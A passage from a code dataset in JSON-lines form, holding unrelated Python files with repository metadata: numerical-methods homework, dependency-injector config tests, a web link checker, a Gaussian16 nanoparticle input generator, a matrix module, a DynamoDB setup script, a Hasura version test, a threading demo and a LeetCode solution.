Newtons_Method(f, dx, x0, tol)\nprint('Result x:', newton_results['x'][-1])\nprint('Iterates:', len(newton_results['x']))\n\n\n# #### b)\n\n# In[52]:\n\n\nplt.plot(list(range(len(newton_results['x']))), newton_results['abs_error'])\nplt.title('Error of Newton\\'s Method')\nplt.xlabel('Iteration')\nplt.ylabel('Error')\nplt.show()\n\n\n# #### c)\n\n# In[66]:\n\n\nrange_of_x0_converage = []\nfailed = []\nfor x0 in x:\n r = Newtons_Method(f, dx, x0, tol)\n if r is False:\n failed.append(x0)\n continue\n if np.abs(r['x'][-1] - newton_results['x'][-1]) < tol:\n range_of_x0_converage.append(x0)\n else:\n failed.append(x0)\nprint(min(range_of_x0_converage), max(range_of_x0_converage))\n\n\n# In[75]:\n\n\nplt.plot(x,f(x))\ngood = np.array(range_of_x0_converage)\nbad = np.array(failed)\nplt.plot(good, f(good), 'r.')\nplt.plot(bad, f(bad), 'b.')\nplt.legend(['good soln', 'wrong soln'])\nplt.title('x0 good vs. wrong convergence')\nplt.xlabel('x0')\nplt.ylabel('f(x0)')\nplt.show()\n\n\n# In[73]:\n\n\nrange_of_convergence = max(list(zip(bad[:-1], bad[1:])), key=lambda d: d[1]-d[0])\nprint('range of convergence (x0): ', range_of_convergence)\n\n\n# ## Problem 2\n# \n# This was strictly for fun!\n\n# In[150]:\n\n\ndef phi_1(x):\n return x**2-2\n\ndef f1(x):\n return x**2-x-2\n\ndef fixed_point_conv(p, f, x0):\n results = {'x' : [x0], 'f' : [f(x0)]}\n for i in range(2):\n x = p(results['x'][-1])\n results['x'].append(x)\n results['f'].append(f(x))\n return results\n\n\n# In[151]:\n\n\nx0 = 0/20\nr = fixed_point_conv(phi_1, f1, x0)\n\n\n# In[152]:\n\n\nr['x'][-1], r['f'][-1]\n\n\n# In[153]:\n\n\nx = np.linspace(-2,3, 100)\n\nplt.plot(x, f1(x))\nplt.plot(x, phi_1(x))\nplt.plot(x, 0*x)\nplt.plot(r['x'], f1(np.array(r['x'])), '.')\nplt.show()\n\n\n# ## Problem 5\n# \n# #### a)\n\n# In[182]:\n\n\ndef get_spetral_radius(A):\n eigs = []\n for lam in np.linalg.eigvals(A):\n try:\n l = (lam.real**2 + lam.imag**2)**(1/2)\n except:\n l = lam\n eigs.append(l)\n \n return np.max(np.abs(eigs))\n\nJ = np.matrix([[0, 2/27, 1/3],\n [1/3, 0, 0],\n [0, 1/3, 0]])\nget_spetral_radius(J)\n\n\n# #### b)\n\n# In[171]:\n\n\ndef phi(x):\n return [\n -1/81*np.cos(x[0])+x[1]**2/9+np.sin(x[2])/3,\n 1/3*np.sin(x[0])+np.cos(x[2])/3,\n -1/9*np.cos(x[0])+x[1]/3+np.sin(x[2])/6\n ]\n\ndef fixed_point_conv(p, x0, tol=1e-8):\n results = {'x' : [x0, p(x0)], 'iterates':2}\n while np.mean(np.abs(np.array(results['x'][-1])-np.array(results['x'][-2]))) > tol:\n x = p(results['x'][-1])\n results['x'].append(x)\n results['iterates'] += 1\n return results\n\n\n# In[172]:\n\n\nx0 = [0,0,0]\nr = fixed_point_conv(phi, x0)\n\n\n# In[178]:\n\n\nprint('Fixed Point Convergence of Equation 3:', r['x'][-1])\n\n\n# #### c)\n\n# In[176]:\n\n\nplt.plot(list(range(r['iterates'])), r['x'])\nplt.title('Fixed Point Convergence of Equation 3')\nplt.xlabel('Iterations')\nplt.ylabel('x')\nplt.legend(['x1', 'x2', 'x3'])\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Terry071896/numerical_analysis_1","sub_path":"hw3/hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26193868964","text":"\"\"\"Configuration(json_files=[...]) tests.\"\"\"\n\nimport json\n\nfrom dependency_injector import providers\nfrom pytest import fixture, mark, raises\n\n\n@fixture\ndef config(config_type, json_config_file_1, json_config_file_2):\n if config_type == \"strict\":\n return providers.Configuration(strict=True)\n elif config_type == \"default\":\n return providers.Configuration(json_files=[json_config_file_1, json_config_file_2])\n else:\n raise ValueError(\"Undefined config type \\\"{0}\\\"\".format(config_type))\n\n\ndef test_load(config):\n config.load()\n\n assert config() == {\n \"section1\": {\n \"value1\": 11,\n \"value11\": 11,\n },\n \"section2\": {\n \"value2\": 2,\n },\n \"section3\": {\n \"value3\": 3,\n },\n }\n assert config.section1() == {\"value1\": 11, \"value11\": 11}\n assert config.section1.value1() == 11\n assert config.section1.value11() == 11\n assert config.section2() == {\"value2\": 2}\n assert config.section2.value2() == 2\n assert config.section3() == {\"value3\": 3}\n assert config.section3.value3() == 3\n\n\ndef test_get_files(config, json_config_file_1, json_config_file_2):\n assert config.get_json_files() == [json_config_file_1, json_config_file_2]\n\n\ndef test_set_files(config):\n config.set_json_files([\"file1.json\", \"file2.json\"])\n assert config.get_json_files() == [\"file1.json\", \"file2.json\"]\n\n\ndef test_copy(config, json_config_file_1, json_config_file_2):\n config_copy = providers.deepcopy(config)\n assert config_copy.get_json_files() == [json_config_file_1, json_config_file_2]\n\n\ndef test_file_does_not_exist(config):\n config.set_json_files([\"./does_not_exist.json\"])\n config.load()\n assert config() == {}\n\n\n@mark.parametrize(\"config_type\", [\"strict\"])\ndef test_file_does_not_exist_strict_mode(config):\n config.set_json_files([\"./does_not_exist.json\"])\n with raises(IOError):\n config.load()\n assert config() == {}\n\n\ndef test_required_file_does_not_exist(config):\n config.set_json_files([\"./does_not_exist.json\"])\n with raises(IOError):\n config.load(required=True)\n\n\n@mark.parametrize(\"config_type\", [\"strict\"])\ndef test_not_required_file_does_not_exist_strict_mode(config):\n config.set_json_files([\"./does_not_exist.json\"])\n config.load(required=False)\n assert config() == {}\n\n\ndef test_missing_envs_required(config, json_config_file_3):\n with open(json_config_file_3, \"w\") as file:\n file.write(\n json.dumps(\n {\n \"section\": {\n \"undefined\": \"${UNDEFINED}\",\n },\n },\n ),\n )\n config.set_json_files([json_config_file_3])\n with raises(ValueError, match=\"Missing required environment variable \\\"UNDEFINED\\\"\"):\n config.load(envs_required=True)\n\n\n@mark.parametrize(\"config_type\", [\"strict\"])\ndef test_missing_envs_not_required_in_strict_mode(config, json_config_file_3):\n with open(json_config_file_3, \"w\") as file:\n file.write(\n json.dumps(\n {\n \"section\": {\n \"undefined\": \"${UNDEFINED}\",\n },\n },\n ),\n )\n config.set_json_files([json_config_file_3])\n config.load(envs_required=False)\n assert config.section.undefined() == \"\"\n","repo_name":"ets-labs/python-dependency-injector","sub_path":"tests/unit/providers/configuration/test_json_files_in_init_py2_py3.py","file_name":"test_json_files_in_init_py2_py3.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":3320,"dataset":"github-code","pt":"77"} +{"seq_id":"21298222296","text":"import re\nimport requests \nfrom bs4 import BeautifulSoup \nimport constant\n\nlinks=constant.wa_links\ntitles=[]\nfor i in links:\n reqs = requests.get(i)\n soup = BeautifulSoup(reqs.text, 'html.parser')\n title=(str(soup.title.text).split(\" WHATSAPP\")[0]).replace(\"\\n\",\"\")\n titles.append(title)\n\nprint(titles)\n\nfor i in links:\n reqs = requests.get(i)\n soup = BeautifulSoup(reqs.text, 'html.parser')\n \n tag=soup.find(\"article\")\n para=tag.text.upper()\n for k in titles:\n title1=(str(soup.title.text).split(\" WHATSAPP\")[0]).replace(\"\\n\",\"\")\n count=0\n if(k==title1):\n continue\n if(para.find(k)!=-1):\n for l in tag.find_all('a'):\n if(l.text.upper()==k):\n count=1\n break\n if(count==0):\n print(\"==============\"+soup.title.text)\n print(\"IN :\"+i)\n print(\"SET:\"+k)\n \n \ninput()\n \n\n","repo_name":"piriyaraj/Html","sub_path":"Tech Farm/whatsapp group link/tools/test/post actor hyperlink checker.py","file_name":"post actor hyperlink checker.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5414159662","text":"#Makes a molecule sandwiched between two hemispheres\n#Then makes Gaussian16 input files for both\n\nimport numpy as np\nimport argparse\nimport KurtGroup.Kurt.structures as struct\nimport KurtGroup.Kurt.chemical_information as ci\nimport KurtGroup.Kurt.xyz as xyz\n\n#INPUTS HERE\n#------------------------------\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, description='''A script to make junction consisting of a molecule and nanoparticles\n\n To use the following must be given:\n xyz-file atom atom diameter''', epilog='''For help contact\n Theo Juncker von Buchwald\n fnc970@alumni.ku.dk''')\n\n parser.add_argument('infile', type=str, nargs='+', help='The file(s) to extract data from', metavar='.xyz file')\n parser.add_argument('atom1', type=int, nargs=1, help='Atom 1 that should be aligned between the nanoparticles')\n parser.add_argument('atom2', type=int, nargs=1, help='Atom 2 that should be aligned between the nanoparticles')\n parser.add_argument('diameter', type=float, nargs=1, help='Diameter of the nanoparticle')\n\n CrystalGroup = parser.add_argument_group('Nanoparticles')\n CrystalGroup.add_argument('-au', action='store_true', help='Include to make gold nanoparticles')\n CrystalGroup.add_argument('-ag', action='store_true', help='Include to make silver nanoparticles')\n CrystalGroup.add_argument('-cu', action='store_true', help='Include to make copper nanoparticles')\n CrystalGroup.add_argument('-tio2', action='store_true', help='Include to make titanium dioxide nanoparticles')\n CrystalGroup.add_argument('-nacl', action='store_true', help='Include to make salt nanoparticles')\n CrystalGroup.add_argument('-pd', action='store_true', help='Include to make palladium nanoparticles')\n CrystalGroup.add_argument('-pt', action='store_true', help='Include to make platinum nanoparticles')\n CrystalGroup.add_argument('-cosb3', action='store_true', help='Include to make CoSb3 nanoparticles')\n CrystalGroup.add_argument('--dist', default=[-100.0], nargs=1, type=float, help='Include to change distance between molecule and nanoparticle (By default van der Waal radii are used)')\n\n CalculationGroup = parser.add_argument_group('Calculation options')\n CalculationGroup.add_argument('--charge', default=[0], nargs=1, type=int, help='Include to specify charge - 0 if not included')\n CalculationGroup.add_argument('--basis', default=['pc-1'], nargs=1, type=str, help='Include to specify basis set of the molecular atoms - pc-1 if not included')\n CalculationGroup.add_argument('--NPbasis', default=['LANL2DZ'], nargs=1, type=str, help='Include to specify basis set of the nanoparticle atoms - LANL2DZ if not included')\n CalculationGroup.add_argument('--ECPbasis', default=['LANL2'], nargs=1, type=str, help='Include to specify electronic core potential basis set for nanoparticle atoms - LANL2 if not included')\n CalculationGroup.add_argument('--method', default=['cam-b3lyp'], nargs=1, type=str, help='Include to specify method for calculation - CAM-B3LYP if not included')\n CalculationGroup.add_argument('--cpu', default=[16], nargs=1, type=int, help='Include to specify the amount of cpu cores - 16 if not included')\n CalculationGroup.add_argument('--mem', default=[16], nargs=1, type=int, help='Include to specify the amount of memory in GB - 16 if not included')\n\n AdditionalCommandsGroup = parser.add_argument_group('Additional commands')\n AdditionalCommandsGroup.add_argument('--outwards', action='store_false', help='Include to turn the nanoparticles outwards')\n AdditionalCommandsGroup.add_argument('--noxyz', action='store_false', help='Include to TURN OFF creation of .xyz files of the nanoparticle system')\n AdditionalCommandsGroup.add_argument('-l', '--linenumber', action='store_true', help='Include to use the linenumber of the atoms in the xyz file instead')\n\n args = parser.parse_args()\n\n Arguments = { #Only crystal structures\n 'Au' : args.au,\n 'Ag' : args.ag,\n 'Cu' : args.cu,\n 'Pt' : args.pt,\n 'Pd' : args.pd,\n 'TiO2' : args.tio2,\n 'NaCl' : args.nacl,\n 'CoSb3' : args.cosb3\n }\n\n if all(value == False for value in Arguments.values()):\n Arguments['Au'] = True\n\n input_files = args.infile\n atom1 = args.atom1[0]\n atom2 = args.atom2[0]\n diameter = args.diameter[0]\n\n charge = args.charge[0]\n basis_mol = args.basis[0]\n basis_NP = args.NPbasis[0]\n basis_ECP = args.ECPbasis[0]\n method = args.method[0]\n ncpus=args.cpu[0]\n mem=args.mem[0]\n\n inwards = args.outwards\n returnxyz = args.noxyz\n linenumber = args.linenumber\n\n user_dist = False\n\n if args.dist[0] >= 0:\n user_dist = True\n dist_mol_nano = args.dist[0]\n print(f\"The distance between molecule and nanoparticle has been set to {dist_mol_nano} Å\")\n elif args.dist[0] != -100:\n print(\"A negative distance between molecule and nanoparticle does not make sense! Defaulting to van der Waal radii.\")\n\n\n\n if linenumber:\n atom1 -=3\n atom2 -=3\n else:\n atom1 -=1\n atom2 -=1\n\n #Check if basis set is in Gaussian already\n BSE_mol = True\n BSE_NP = True\n BSE_ECP = True\n\n BSE_mol = ci.BasisSet.CheckBasisSet('Gaussian94', basis_mol)\n BSE_NP = ci.BasisSet.CheckBasisSet('Gaussian94', basis_NP)\n BSE_ECP = ci.BasisSet.CheckBasisSet('Gaussian94', basis_ECP)\n\n basis_mol_exists = xyz.checkBasis('Gaussian94', basis_mol)\n basis_NP_exists = xyz.checkBasis('Gaussian94', basis_NP)\n basis_ECP_exists = xyz.checkBasis('Gaussian94', basis_ECP)\n\n # Getting basis set from Basis set exchange\n BasisSet = ci.BasisSet()\n\n for molfile in input_files:\n namesmol = np.array([])\n molxyz = struct.Molecule(np.empty((0, 3)))\n with open(molfile, 'r') as f:\n lines = f.readlines()\n for i in range(2, len(lines)):\n x = lines[i].split()\n namesmol = np.append(namesmol, x[0])\n molxyz.molecule = np.vstack([molxyz.molecule, np.array([float(x[1]), float(x[2]), float(x[3])])])\n\n if BSE_mol and not basis_mol_exists:\n basis_mol = BasisSet.GenerateBasisSet('gaussian94', basis_mol, namesmol)\n\n\n #We get the axis between the two points to be parallel to the x-axis and then translate it such that it lies in the x-axis\n #Get normalized vector defining the axis\n v1 = molxyz.molecule[atom1, :] - molxyz.molecule[atom2, :]\n v1 *= 1 / np.sqrt(np.dot(v1, v1))\n\n #Calculate angle in order to be parallel to the x-axis\n theta = np.arccos(np.dot(v1, np.array([1, 0, 0])))\n\n #The direction vector for the rotation in orthogonal to both v1 and the x-axis. Note that the normalization is crucial.\n dir_vec = np.cross(v1, np.array([1, 0, 0]))\n dir_vec *= 1/np.sqrt(np.dot(dir_vec, dir_vec))\n\n molxyz.get_rotation_matrix(molxyz.molecule[atom1], dir_vec, theta)\n molxyz.rotateMolecule(atom1)\n\n molxyz.__xlen__()\n\n mol_min = molxyz.min()\n mol_max = molxyz.max()\n\n index_min = molxyz.index_min()\n index_max = molxyz.index_max()\n\n #Rescaling to get index in array\n\n #Crystal Structure (Au, Ag, Cu, TiO2, NaCl, CoSb3, Pt, Pd)\n crystal_structures = [item[0] for item in Arguments.items() if item[1] == True]\n for crystal_structure in crystal_structures:\n NP = struct.NanoParticle(crystal_structure)\n\n NP.setInwards(inwards)\n NP.setDiameter(diameter)\n\n atoms_symbol, atoms_pos = NP.makeNanoparticle(diameter)\n\n if user_dist:\n left, right, left_symbols, right_symbols = NP.makeSandwich(molxyz, namesmol,input_dist=dist_mol_nano)\n else:\n left, right, left_symbols, right_symbols = NP.makeSandwich(molxyz, namesmol)\n\n atmtype = NP.atomtypes\n\n if BSE_NP and not basis_NP_exists:\n basis_NP = BasisSet.GenerateBasisSet('gaussian94', basis_NP, atmtype)\n if BSE_ECP and not basis_ECP_exists:\n basis_ECP = BasisSet.GenerateBasisSet('gaussian94', basis_ECP, atmtype)\n\n if returnxyz:\n #Build .xyz files\n for j in ['left','right']:\n lines_to_add = []\n lines_to_add.append(str(left[:,0].size+molxyz.molecule[:,0].size)+'\\n')\n lines_to_add.append('\\n')\n\n for i in range(len(left[:,0])):\n if j == 'left':\n lines_to_add.append(''.join([atoms_symbol[i],' ',f\"{left[i,0]:.6f}\",' ', f\"{left[i,1]:.6f}\", ' ',f\"{left[i,2]:.6f}\" ,'\\n']))\n else:\n lines_to_add.append(''.join([atoms_symbol[i],' ',f\"{right[i,0]:.6f}\",' ', f\"{right[i,1]:.6f}\", ' ',f\"{right[i,2]:.6f}\" ,'\\n']))\n\n for i in range(len(molxyz.molecule[:,0])):\n lines_to_add.append(''.join([namesmol[i],' ',f\"{molxyz.molecule[i,0]:.6f}\",' ', f\"{molxyz.molecule[i,1]:.6f}\", ' ',f\"{molxyz.molecule[i,2]:.6f}\" ,'\\n']))\n\n with open(molfile[:-4] + f'_charge_{charge}_{crystal_structure}_'+j+'.xyz','w') as f:\n f.writelines(lines_to_add)\n\n\n for j in ['left','right']:\n filename = molfile[:-4] + f'_charge_{charge}_{crystal_structure}_'+j\n lines_com = []\n lines_com.append(f\"%mem={mem}GB\\n\")\n lines_com.append(f\"%nprocshared={ncpus}\\n\")\n lines_com.append(f\"%chk={filename}.chk\\n\")\n lines_com.append(f\"# {method}/GEN PSEUDO=READ scf=qc pop=full iop(3/33=1)\\n\")\n lines_com.append('\\n')\n if user_dist:\n lines_com.append(f\"Hej Magnus - {molfile}-{j} - Distance has been set as {dist_mol_nano} Å by the user\\n\")\n else:\n lines_com.append(f\"Hej Theo - {molfile}-{j}\\n\")\n lines_com.append('\\n')\n\n nr_of_electrons = 0\n if j == 'left':\n for i in range(len(left[:,0])):\n nr_of_electrons += ci.getAtomnr(atoms_symbol[i])\n else:\n for i in range(len(right[:,0])):\n nr_of_electrons += ci.getAtomnr(atoms_symbol[i])\n if nr_of_electrons % 2:\n multiplicity = 2\n else:\n multiplicity = 1\n\n if charge == 0 or abs(charge) == 2:\n lines_com.append(f\"{charge} {multiplicity} {charge} 1 0 1\\n\")\n else:\n lines_com.append(f\"{charge} {multiplicity} {charge} 2 0 1\\n\")\n for i in range(len(namesmol)):\n lines_com.append(''.join([namesmol[i],'(Fragment=1)',' ',f\"{molxyz.molecule[i,0]:.9f}\",' ', f\"{molxyz.molecule[i,1]:.9f}\", ' ',f\"{molxyz.molecule[i,2]:.9f}\" ,'\\n']))\n if j == 'left':\n for i in range(len(left[:,0])):\n lines_com.append(''.join([atoms_symbol[i],'(Fragment=2)',' ',f\"{left[i,0]:.9f}\",' ', f\"{left[i,1]:.9f}\", ' ',f\"{left[i,2]:.9f}\" ,'\\n']))\n else:\n for i in range(len(right[:,0])):\n lines_com.append(''.join([atoms_symbol[i],'(Fragment=2)',' ',f\"{right[i,0]:.9f}\",' ', f\"{right[i,1]:.9f}\", ' ',f\"{right[i,2]:.9f}\" ,'\\n']))\n lines_com.append('\\n')\n for i in atmtype:\n if i not in set(namesmol):\n if basis_NP_exists:\n lines_com.append(i+'\\n')\n lines_com.append(basis_NP+'\\n')\n lines_com.append('****'+'\\n')\n else:\n lines_com.append(basis_NP+'\\n')\n break\n for i in set(namesmol):\n if i not in atmtype:\n if basis_mol_exists:\n lines_com.append(i+'\\n')\n lines_com.append(basis_mol+'\\n')\n lines_com.append('****'+'\\n')\n else:\n lines_com.append(basis_mol)\n break\n for i in atmtype:\n if basis_ECP_exists:\n lines_com.append(i+' 0\\n')\n lines_com.append(basis_ECP+'\\n')\n lines_com.append('\\n')\n else:\n lines_com.append(basis_ECP+'\\n')\n lines_com.append('\\n')\n with open(filename+'.com','w') as f:\n f.writelines(lines_com)\n\n if returnxyz:\n print(molfile[:-4]+f'_charge_{charge}_{crystal_structure}_left.xyz')\n print(molfile[:-4]+f'_charge_{charge}_{crystal_structure}_right.xyz')\n print(molfile[:-4]+f'_charge_{charge}_{crystal_structure}_left.com')\n print(molfile[:-4]+f'_charge_{charge}_{crystal_structure}_right.com')\n","repo_name":"TheoBuchwald/UCPH-KVM","sub_path":"leftright.py","file_name":"leftright.py","file_ext":"py","file_size_in_byte":13248,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"20315689043","text":"import tkinter as tk\nfrom math import sqrt\nfrom copy import deepcopy\n\n\nclass Matrix:\n def __init__(self, matrix: list) -> None:\n if not len(matrix):\n raise ValueError(\"Can't make matrix from empty array.\")\n\n self.matrix = matrix\n self.x_size = len(matrix[0])\n self.y_size = len(matrix)\n\n def vector_length(self):\n if any([len(x) > 1 for x in self.matrix]):\n raise ValueError(\"This is not a vector.\")\n\n return sqrt(sum([sum(x) ** 2 for x in self.matrix[:-1]]))\n\n def normalize(self):\n matrix = deepcopy(self.matrix)\n length = self.vector_length()\n\n return Matrix([list(map(lambda y: y / length, x)) for x in matrix])\n\n def shape(self):\n return (self.x_size, self.y_size)\n\n def __str__(self) -> str:\n return self.matrix.__str__()\n\n def __repr__(self) -> str:\n return self.matrix.__str__()\n\n def __add__(self, other):\n if self.shape() != other.shape():\n return ValueError(\"Matrices do not share the same shape.\")\n\n matrix = []\n for row in range(self.y_size):\n matrix.append([])\n for col in range(self.x_size):\n matrix[-1].append(self.matrix[row][col] + other[row][col])\n\n return Matrix(matrix)\n\n def __sub__(self, other):\n if self.shape() != other.shape():\n return ValueError(\"Matrices do not share the same shape.\")\n\n matrix = []\n for row in range(self.y_size):\n matrix.append([])\n for col in range(self.x_size):\n matrix[-1].append(self.matrix[row][col] - other[row][col])\n\n return Matrix(matrix)\n\n def __truediv__(self, other):\n if type(other) == Matrix:\n raise ValueError(\"Cannot divide matrices.\")\n\n matrix = []\n for row in range(self.y_size):\n matrix.append([])\n for col in range(self.x_size):\n matrix[-1].append(self.matrix[row][col] / other)\n\n return Matrix(matrix)\n\n def __mul__(self, other):\n if type(other) == Matrix:\n if self.x_size != other.y_size and self.x_size != 1 and other.x_size != 1:\n raise ValueError(\"Cannot multiply matrice with wrong dimensions.\")\n\n matrix = []\n\n if self.x_size == 1 and other.x_size == 1:\n tmp = 0\n\n for x in range(3):\n tmp += self.matrix[x][0] * other.matrix[x][0]\n\n return tmp\n\n for row in range(self.y_size):\n matrix.append([])\n for col in range(other.x_size):\n matrix[-1].append(0)\n\n for row in range(self.y_size):\n for col in range(other.x_size):\n for i in range(other.y_size):\n matrix[row][col] += self.matrix[row][i] * other.matrix[i][col]\n\n return Matrix(matrix)\n\n elif type(other) in (int, float):\n matrix = Matrix(list(self.matrix))\n\n for row in range(self.y_size):\n for col in range(self.x_size):\n matrix.matrix[row][col] *= other\n\n return matrix\n\n raise NotImplementedError()\n\n def __getitem__(self, key):\n return self.matrix[key]\n\n\nclass IndexedFace:\n verteces = None\n indeces = None\n\n def __init__(self, verteces: list, indeces: list) -> None:\n self.verteces = verteces\n self.original_verteces = deepcopy(verteces)\n self.indeces = indeces\n\n def __str__(self) -> str:\n return f\"IndexedFace - {self.verteces}\"\n\n def __repr__(self) -> str:\n return f\"IndexedFace - {self.verteces}\"\n\n def set_color(self, color):\n self.color = color\n\n def set_transformation_matrix(self, transformation_matrix):\n self.transform = transformation_matrix\n\n for i in range(len(self.verteces)):\n self.verteces[i] = self.transform * self.verteces[i]\n\n def reset(self):\n self.verteces = deepcopy(self.original_verteces)\n\n def display(self, canvas: tk.Canvas, transform: Matrix, luminosity: float):\n points = []\n\n for vertex in self.verteces:\n points.append(vertex[0][0])\n points.append(vertex[1][0])\n\n color = (int(x * luminosity) for x in self.color)\n hexcode = \"#\"\n\n for value in color:\n hexvalue = hex(value)\n\n if hexvalue[0] == \"-\":\n hexvalue = hexvalue[3:]\n else:\n hexvalue = hexvalue[2:]\n\n if len(hexvalue) == 1:\n hexvalue = \"0\" + hexvalue\n\n hexcode += hexvalue\n\n canvas.create_polygon(points, fill=hexcode)\n\n def center_of_gravity(self):\n matrix = []\n\n for row in range(4):\n matrix.append([sum([x[row][0] for x in self.verteces]) / 3])\n\n return Matrix(matrix)\n\n def get_normal(self):\n v1 = self.verteces[1] - self.verteces[0]\n v2 = self.verteces[2] - self.verteces[0]\n\n Cx = v1[1][0] * v2[2][0] - v1[2][0] * v2[1][0]\n Cy = v1[2][0] * v2[0][0] - v1[0][0] * v2[2][0]\n Cz = v1[0][0] * v2[1][0] - v1[1][0] * v2[0][0]\n\n return Matrix([[Cx], [Cy], [Cz]])\n\n\nif __name__ == \"__main__\":\n # m = Matrix([[1, 0], [0, 1]])\n\n # print(m * 5)\n\n # m2 = Matrix([[0, 0],\n # [0, 0]])\n\n # print(m * m2)\n\n # m3 = Matrix([[2, 7], [9, 14]])\n\n # print(m * m3)\n\n v1 = Matrix([[1], [2], [3]])\n v2 = Matrix([[2], [3], [4]])\n\n print(v1 * v2)\n","repo_name":"ipinfil/zpgso-project","sub_path":"geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":5544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37225704273","text":"#!/usr/local/bin/python\nimport boto3\nfrom botocore.exceptions import ClientError, EndpointConnectionError\n\ndynamo_client = boto3.client(\n 'dynamodb',\n endpoint_url='http://localhost:4566'\n)\n\ndef create_text_table():\n global dynamo_client\n dynamo_client.create_table(\n TableName='texts',\n BillingMode='PAY_PER_REQUEST',\n AttributeDefinitions=[\n {\n 'AttributeName': 'id',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'id',\n 'KeyType': 'HASH'\n }\n ]\n )\n\nis_to_keep_trying_to_create_database = True\nwhile is_to_keep_trying_to_create_database:\n try:\n create_text_table()\n is_to_keep_trying_to_create_database = False\n except ClientError as e:\n error = e.response.get('Error').get('Code')\n if error == 'ResourceInUseException':\n is_to_keep_trying_to_create_database = False\n else:\n raise e\n except EndpointConnectionError:\n continue","repo_name":"PeterCcT/presentation-kubernetes-basics","sub_path":"database/create_database.py","file_name":"create_database.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37569273762","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport re\n\nclass TestServerVersion(object):\n\n def test_version(self, hge_ctx):\n resp = hge_ctx.http.get(\n hge_ctx.hge_url + '/v1/version'\n )\n assert resp.status_code == 200, resp\n version_json = resp.json()\n assert isinstance(version_json, dict), version_json\n\n server_version = version_json['version']\n\n # The magic number here means we're compiling for local development and\n # this test can be ignored:\n if server_version == '12345':\n return\n\n # Grab the Git details so that we know why things changed.\n def error_message():\n git_status = subprocess.run(['git', 'status', '--porcelain'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding='utf8').stdout\n git_diff = subprocess.run(['git', 'diff-index', '-p', 'HEAD', '--'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding='utf8').stdout\n return f'Version JSON:\\n{version_json}\\n\\nGit status:\\n{git_status}\\n\\nGit diff:{git_diff}\\n'\n\n # The tree may be dirty because we're developing tests locally while\n # graphql-engine was built previously when tree was clean. If we're\n # modifying graphql-engine too then both of these will be tagged dirty,\n # since a rebuild would necessarily be forced:\n assert server_version in (hge_ctx.version, re.sub('-dirty$', '', hge_ctx.version)), error_message()\n","repo_name":"hasura/graphql-engine","sub_path":"server/tests-py/test_version.py","file_name":"test_version.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":30481,"dataset":"github-code","pt":"77"} +{"seq_id":"8878338967","text":"import threading\nfrom multiprocessing import Queue\nimport queue\n\nitems = ['car', 'two-wheeler', 'plane']\n\ndef execute():\n if q.not_empty:\n print('In execute method')\n item = q.get()\n val = item * 2\n print(val)\n q.task_done()\n #print(q.get())\n\nq = queue.Queue()\ntlist = []\nfor i in range(4):\n t = threading.Thread(target=execute)\n tlist.append(t)\n t.start()\n\nfor item in items:\n q.put(item) # put the items in queue\n\n#for i in tlist:\n# i.join()\n\nq.join()\n\nprint('done')\nprint('exit')\n#q.join()\n#print(q.unfinished_tasks)","repo_name":"sivaprasadkonduru/Python-Programs","sub_path":"Dreamwin4/thread_communicate.py","file_name":"thread_communicate.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"32415809309","text":"import time\nfrom typing import Optional\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n carry = 0\n last = ListNode(-1)\n node = last\n \n while l1 and l2:\n # We calculate the sum \n sum = l1.val + l2.val + carry\n \n # We create the new node, append it and update last to point to it\n last.next = ListNode(sum % 10, None)\n last = last.next \n \n # We update the carry\n carry = int(sum/10)\n \n # We update l1 and l2\n l1 = l1.next\n l2 = l2.next\n \n # If there are still nodes in l1\n while l1:\n # We calculate the sum \n sum = l1.val + carry\n \n # We create the new node, append it and update last to point to it\n last.next = ListNode(sum % 10, None)\n last = last.next\n \n # We update the carry\n carry = int(sum/10)\n \n # We update l1\n l1 = l1.next\n \n # If there are still nodes in l2\n while l2:\n # We calculate the sum \n sum = l2.val + carry\n \n # We create the new node, append it and update last to point to it\n last.next = ListNode(sum % 10, None)\n last = last.next\n \n # We update the carry\n carry = int(sum/10)\n \n # We update l2\n l2 = l2.next\n \n # If there's remaining carry we update it\n while carry > 0:\n # We calculate the sum \n sum = carry\n \n # We create the new node, append it and update last to point to it\n last.next = ListNode(sum % 10, None)\n last = last.next\n \n # We update the carry\n carry = int(sum/10)\n \n return node\n \n# Program\nl1 = ListNode(2, ListNode(4, ListNode(3, None)))\nl2 = ListNode(5, ListNode(6, ListNode(4, None)))\n\nr1 = ListNode(9, ListNode(9, ListNode(9, ListNode(9, ListNode(9, ListNode(9, ListNode(9, None)))))))\nr2 = ListNode(9, ListNode(9, ListNode(9, ListNode(9, None))))\n\nt0 = time.perf_counter_ns()\n\ns = Solution()\n\nprint(s.addTwoNumbers(l1, l2))\nprint(s.addTwoNumbers(r1, r2))\n\nt1 = time.perf_counter_ns()\n\nprint(f\"{(t1-t0)/1000000} ms.\") 